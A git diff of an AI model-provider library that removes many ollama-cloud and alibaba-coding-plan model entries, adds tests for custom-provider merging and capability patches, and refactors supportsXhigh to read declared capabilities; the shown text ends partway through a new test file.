api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 16384, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM-4.7", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 169984, - maxTokens: 16384, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "kimi-k2.5": { - id: "kimi-k2.5", - name: "Kimi K2.5", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 258048, - maxTokens: 32768, - compat: { thinkingFormat: "zai", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - }, - "ollama-cloud": { - "cogito-2.1:671b": { - id: "cogito-2.1:671b", - name: "Cogito 2.1 671B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 32000, - } satisfies Model<"openai-completions">, - "deepseek-v3.1:671b": { - id: "deepseek-v3.1:671b", - name: "DeepSeek V3.1 671B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 163840, - } satisfies Model<"openai-completions">, - "deepseek-v3.2": { - id: "deepseek-v3.2", - name: "DeepSeek V3.2", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "devstral-2:123b": { - id: "devstral-2:123b", - name: "Devstral 2 123B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "devstral-small-2:24b": { - id: "devstral-small-2:24b", - name: "Devstral Small 2 24B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "gemini-3-flash-preview": { - id: "gemini-3-flash-preview", - name: "Gemini 3 Flash Preview", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "gemma3:12b": { - id: "gemma3:12b", - name: "Gemma 3 12B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, + contextWindow: 200000, maxTokens: 131072, } satisfies Model<"openai-completions">, - "gemma3:27b": { - id: "gemma3:27b", - name: "Gemma 3 27B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "gemma3:4b": { - id: "gemma3:4b", - name: "Gemma 3 4B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.6": { - id: "glm-4.6", - name: "GLM 4.6", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM 4.7", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-5": { - id: "glm-5", - name: "GLM 5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "gpt-oss:120b": { - id: "gpt-oss:120b", - name: "GPT-OSS 120B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "gpt-oss:20b": { - id: "gpt-oss:20b", - name: "GPT-OSS 20B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "kimi-k2:1t": { - id: "kimi-k2:1t", - name: "Kimi K2 1T", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "kimi-k2.5": { - id: "kimi-k2.5", - name: "Kimi K2.5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "kimi-k2-thinking": { - id: "kimi-k2-thinking", - name: "Kimi K2 Thinking", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "minimax-m2.1": { - id: "minimax-m2.1", - name: "Minimax M2.1", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "minimax-m2.5": { - id: "minimax-m2.5", - name: "Minimax M2.5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "minimax-m2": { - id: "minimax-m2", - name: "Minimax M2", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:14b": { - id: "ministral-3:14b", - name: "Ministral 3 14B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:3b": { - id: "ministral-3:3b", - name: "Ministral 3 3B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:8b": { - id: "ministral-3:8b", - name: "Ministral 3 8B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "mistral-large-3:675b": { - id: "mistral-large-3:675b", - name: "Mistral Large 3 675B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "nemotron-3-nano:30b": { - id: "nemotron-3-nano:30b", - name: "Nemotron 3 Nano 30B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "nemotron-3-super": { - id: "nemotron-3-super", - name: "Nemotron 3 Super", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3.5:397b": { - id: "qwen3.5:397b", - name: "Qwen 3.5 397B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 81920, - } satisfies Model<"openai-completions">, - "qwen3-coder:480b": { - id: "qwen3-coder:480b", - name: "Qwen 3 Coder 480B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3-coder-next": { - id: "qwen3-coder-next", - name: "Qwen 3 Coder Next", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3-next:80b": { - id: "qwen3-next:80b", - name: "Qwen 3 Next 80B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "qwen3-vl:235b-instruct": { - id: "qwen3-vl:235b-instruct", - name: "Qwen 3 VL 235B Instruct", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "qwen3-vl:235b": { - id: "qwen3-vl:235b", - name: "Qwen 3 VL 235B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "rnj-1:8b": { - id: "rnj-1:8b", - name: "RNJ 1 8B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 32768, - maxTokens: 4096, - } satisfies Model<"openai-completions">, }, } as const; diff --git a/packages/pi-ai/src/models.test.ts b/packages/pi-ai/src/models.test.ts new file mode 100644 index 000000000..068004ad3 --- /dev/null +++ b/packages/pi-ai/src/models.test.ts @@ -0,0 +1,231 @@ +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { getProviders, getModels, getModel, supportsXhigh, applyCapabilityPatches } from "./models.js"; +import type { Api, Model } from "./types.js"; + +// ═══════════════════════════════════════════════════════════════════════════ +// Custom provider preservation (regression: #2339) +// +// Custom providers (like alibaba-coding-plan) are manually maintained and +// NOT sourced from models.dev. They must survive models.generated.ts +// regeneration by living in models.custom.ts. +// ═══════════════════════════════════════════════════════════════════════════ + +describe("model registry — custom providers", () => { + it("alibaba-coding-plan is a registered provider", () => { + const providers = getProviders(); + assert.ok( + providers.includes("alibaba-coding-plan"), + `Expected "alibaba-coding-plan" in providers, got: ${providers.join(", ")}`, + ); + }); + + it("alibaba-coding-plan has all expected models", () => { + const models = getModels("alibaba-coding-plan"); + const ids = models.map((m) => m.id).sort(); + const expected = [ + "MiniMax-M2.5", + "glm-4.7", + "glm-5", + "kimi-k2.5", + "qwen3-coder-next", + "qwen3-coder-plus", + "qwen3-max-2026-01-23", + "qwen3.5-plus", + ]; + assert.deepEqual(ids, expected); + }); + + it("alibaba-coding-plan models use the correct base URL", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal( + model.baseUrl, + "https://coding-intl.dashscope.aliyuncs.com/v1", + `Model ${model.id} has wrong baseUrl: ${model.baseUrl}`, + ); + } + }); + + it("alibaba-coding-plan models use openai-completions API", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal(model.api, "openai-completions", `Model ${model.id} has wrong api: ${model.api}`); + } + }); + + it("alibaba-coding-plan models have provider set correctly", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal( + model.provider, + "alibaba-coding-plan", + `Model ${model.id} has wrong provider: ${model.provider}`, + ); + } + }); + + it("getModel retrieves alibaba-coding-plan models by provider+id", () => { + // Use type assertion to test runtime behavior — alibaba-coding-plan may come + // from custom models rather than the generated file, so the narrow + // GeneratedProvider type doesn't include it until models.custom.ts is merged. + const model = getModel("alibaba-coding-plan" as any, "qwen3.5-plus" as any); + assert.ok(model, "Expected getModel to return a model for alibaba-coding-plan/qwen3.5-plus"); + assert.equal(model.id, "qwen3.5-plus"); + assert.equal(model.provider, "alibaba-coding-plan"); + }); +}); + +describe("model registry — custom zai provider (GLM-5.1)", () => { + it("zai provider includes glm-5.1 from custom models", () => { + const models = getModels("zai" as any); + const ids = models.map((m) => m.id); + assert.ok(ids.includes("glm-5.1"), `Expected "glm-5.1" in zai models, got: ${ids.join(", ")}`); + }); + + it("glm-5.1 has correct provider and base URL", () => { + const model = getModel("zai" as any, "glm-5.1" as any); + assert.ok(model, "Expected getModel to return a model for zai/glm-5.1"); + assert.equal(model.id, "glm-5.1"); + assert.equal(model.provider, "zai"); + assert.equal(model.baseUrl, "https://api.z.ai/api/coding/paas/v4"); + assert.equal(model.api, "openai-completions"); + }); + + it("glm-5.1 has reasoning enabled and correct context window", () => { + const model = getModel("zai" as any, "glm-5.1" as any); + assert.ok(model); + assert.equal(model.reasoning, true); + assert.equal(model.contextWindow, 204800); + assert.equal(model.maxTokens, 131072); + }); + + it("custom glm-5.1 does not overwrite generated zai models", () => { + const models = getModels("zai" as any); + const ids = models.map((m) => m.id); + // Generated models must still exist alongside custom glm-5.1 + assert.ok(ids.includes("glm-5"), "Generated glm-5 should still exist"); + assert.ok(ids.includes("glm-5-turbo"), "Generated glm-5-turbo should still exist"); + }); +}); + +describe("model registry — custom models do not collide with generated models", () => { + it("generated providers still exist alongside custom providers", () => { + const providers = getProviders(); + // Spot-check a few generated providers + assert.ok(providers.includes("openai"), "openai should be in providers"); + assert.ok(providers.includes("anthropic"), "anthropic should be in providers"); + }); +}); + +// ═══════════════════════════════════════════════════════════════════════════ +// Capability patches (regression: #2546) +// +// CAPABILITY_PATCHES must apply capabilities to models in the static +// registry AND to models constructed outside of it (custom, extension, +// discovered). supportsXhigh() reads model.capabilities — not model IDs. +// ═══════════════════════════════════════════════════════════════════════════ + +/** Helper: build a minimal synthetic model for testing */ +function syntheticModel(overrides: Partial>): Model { + return { + id: "test-model", + name: "Test Model", + api: "openai-completions" as Api, + provider: "test-provider", + baseUrl: "https://example.com", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + ...overrides, + } as Model; +} + +describe("supportsXhigh — registry models", () => { + it("returns true for GPT-5.4 from the registry", () => { + const model = getModel("openai", "gpt-5.4" as any); + if (!model) return; // skip if model not in generated catalog + assert.equal(supportsXhigh(model), true); + }); + + it("returns false for a non-reasoning model", () => { + const models = getModels("openai"); + const nonXhigh = models.find((m) => !m.id.includes("gpt-5.")); + if (!nonXhigh) return; + assert.equal(supportsXhigh(nonXhigh), false); + }); +}); + +describe("supportsXhigh — synthetic models (regression: custom/extension models)", () => { + it("returns false for a model without capabilities", () => { + const model = syntheticModel({ id: "my-custom-model" }); + assert.equal(supportsXhigh(model), false); + }); + + it("returns true when capabilities.supportsXhigh is explicitly set", () => { + const model = syntheticModel({ + id: "my-custom-model", + capabilities: { supportsXhigh: true }, + }); + assert.equal(supportsXhigh(model), true); + }); +}); + +describe("applyCapabilityPatches", () => { + it("patches a GPT-5.4 model that has no capabilities", () => { + const model = syntheticModel({ id: "gpt-5.4-custom" }); + assert.equal(model.capabilities, undefined); + + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + assert.equal(patched.capabilities?.supportsServiceTier, true); + }); + + it("patches a GPT-5.2 model", () => { + const model = syntheticModel({ id: "gpt-5.2" }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + }); + + it("patches an Anthropic Opus 4.6 model", () => { + const model = syntheticModel({ + id: "claude-opus-4-6-20260301", + api: "anthropic-messages" as Api, + }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + // Opus should not get supportsServiceTier + assert.equal(patched.capabilities?.supportsServiceTier, undefined); + }); + + it("preserves explicit capabilities over patches", () => { + const model = syntheticModel({ + id: "gpt-5.4-custom", + capabilities: { supportsXhigh: false, charsPerToken: 3 }, + }); + const [patched] = applyCapabilityPatches([model]); + // Explicit supportsXhigh: false wins over patch's true + assert.equal(patched.capabilities?.supportsXhigh, false); + // Patch fills in supportsServiceTier since it wasn't explicitly set + assert.equal(patched.capabilities?.supportsServiceTier, true); + // Explicit charsPerToken is preserved + assert.equal(patched.capabilities?.charsPerToken, 3); + }); + + it("does not modify models that match no patches", () => { + const model = syntheticModel({ id: "gemini-2.5-pro" }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities, undefined); + // Should return the same reference when unpatched + assert.equal(patched, model); + }); + + it("is idempotent — re-applying patches produces the same result", () => { + const model = syntheticModel({ id: "gpt-5.3" }); + const first = applyCapabilityPatches([model]); + const second = applyCapabilityPatches(first); + assert.deepEqual(first[0].capabilities, second[0].capabilities); + }); +}); diff --git a/packages/pi-ai/src/models.ts b/packages/pi-ai/src/models.ts index 3c06c0cc6..ac0a729b7 100644 --- a/packages/pi-ai/src/models.ts +++ b/packages/pi-ai/src/models.ts @@ -1,9 +1,10 @@ import { MODELS } from "./models.generated.js"; -import type { Api, KnownProvider, Model, Usage } from "./types.js"; +import { CUSTOM_MODELS } from "./models.custom.js"; +import type { Api, KnownProvider, Model, ModelCapabilities, Usage } from "./types.js"; const modelRegistry: Map>> = new Map(); -// Initialize registry from MODELS on module load +// Initialize registry from auto-generated MODELS (models.dev catalog) for (const [provider, models] of Object.entries(MODELS)) { const providerModels = new Map>(); for (const [id, model] of Object.entries(models)) { @@ -12,12 +13,95 @@ for (const [provider, models] of Object.entries(MODELS)) { modelRegistry.set(provider, providerModels); } +// Merge manually-maintained custom providers that are NOT in models.dev. +// Custom models are additive — they never overwrite generated entries. +// See: https://github.com/gsd-build/gsd-2/issues/2339 +for (const [provider, models] of Object.entries(CUSTOM_MODELS)) { + if (!modelRegistry.has(provider)) { + modelRegistry.set(provider, new Map>()); + } + const providerModels = modelRegistry.get(provider)!; + for (const [id, model] of Object.entries(models)) { + if (!providerModels.has(id)) { + providerModels.set(id, model as Model); + } + } +} + +// ─── Capability Patches ─────────────────────────────────────────────────────── +// +// Declare capabilities for models that pre-date the `capabilities` field or +// that live in the auto-generated catalog (models.generated.ts) which we +// cannot edit directly. Pattern-matching on model IDs is acceptable HERE +// because this is the single source of truth — call sites must never repeat it. +// +// Add new entries as additional capabilities emerge. Existing models that +// define `capabilities` in their model definition take precedence (the patch +// only fills in fields that are not already set). + +type CapabilityPatch = { match: (m: Model) => boolean; caps: ModelCapabilities }; + +const CAPABILITY_PATCHES: CapabilityPatch[] = [ + // GPT-5.x supports xhigh thinking and OpenAI service tiers + { + match: (m) => m.id.includes("gpt-5.2") || m.id.includes("gpt-5.3") || m.id.includes("gpt-5.4"), + caps: { supportsXhigh: true, supportsServiceTier: true }, + }, + // Anthropic Opus 4.6 supports xhigh thinking + { + match: (m) => m.api === "anthropic-messages" && (m.id.includes("opus-4-6") || m.id.includes("opus-4.6")), + caps: { supportsXhigh: true }, + }, +]; + +/** + * Apply capability patches to a list of models. + * + * Models constructed outside the static pi-ai registry (custom models from + * models.json, extension-registered models, discovered models) do not pass + * through the module-init patch loop. Call this function after assembling + * any model list to ensure capabilities are set correctly. + * + * Explicit `capabilities` already set on a model take precedence over patches. + */ +export function applyCapabilityPatches(models: Model[]): Model[] { + return models.map((model) => { + for (const patch of CAPABILITY_PATCHES) { + if (patch.match(model)) { + return { + ...model, + capabilities: { ...patch.caps, ...model.capabilities }, + }; + } + } + return model; + }); +} + +// Apply patches to the static registry at module load +for (const [, providerModels] of modelRegistry) { + for (const [id, model] of providerModels) { + for (const patch of CAPABILITY_PATCHES) { + if (patch.match(model)) { + providerModels.set(id, { + ...model, + capabilities: { ...patch.caps, ...model.capabilities }, + }); + break; + } + } + } +} + +/** Providers that have entries in the generated MODELS constant */ +type GeneratedProvider = keyof typeof MODELS & KnownProvider; + type ModelApi< - TProvider extends KnownProvider, + TProvider extends GeneratedProvider, TModelId extends keyof (typeof MODELS)[TProvider], > = (typeof MODELS)[TProvider][TModelId] extends { api: infer TApi } ? (TApi extends Api ? TApi : never) : never; -export function getModel( +export function getModel( provider: TProvider, modelId: TModelId, ): Model> { @@ -31,9 +115,9 @@ export function getProviders(): KnownProvider[] { export function getModels( provider: TProvider, -): Model>[] { +): Model[] { const models = modelRegistry.get(provider); - return models ? (Array.from(models.values()) as Model>[]) : []; + return models ? (Array.from(models.values()) as Model[]) : []; } export function calculateCost(model: Model, usage: Usage): Usage["cost"] { @@ -48,20 +132,12 @@ export function calculateCost(model: Model, usage: Usage /** * Check if a model supports xhigh thinking level. * - * Supported today: - * - GPT-5.2 / GPT-5.3 / GPT-5.4 model families - * - Anthropic Messages API Opus 4.6 models (xhigh maps to adaptive effort "max") + * Reads from `model.capabilities.supportsXhigh` — set via CAPABILITY_PATCHES + * for generated models or declared directly in custom model definitions. + * Do not add model-ID or provider-name checks here; update CAPABILITY_PATCHES instead. */ export function supportsXhigh(model: Model): boolean { - if (model.id.includes("gpt-5.2") || model.id.includes("gpt-5.3") || model.id.includes("gpt-5.4")) { - return true; - } - - if (model.api === "anthropic-messages") { - return model.id.includes("opus-4-6") || model.id.includes("opus-4.6"); - } - - return false; + return model.capabilities?.supportsXhigh ?? false; } /** diff --git a/packages/pi-ai/src/providers/anthropic-shared.test.ts b/packages/pi-ai/src/providers/anthropic-shared.test.ts new file mode 100644 index 000000000..9b6718570 --- /dev/null +++ b/packages/pi-ai/src/providers/anthropic-shared.test.ts @@ -0,0 +1,29 @@ +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mapStopReason } from "./anthropic-shared.js"; + +describe("mapStopReason", () => { + it("maps end_turn to stop", () => { + assert.equal(mapStopReason("end_turn"), 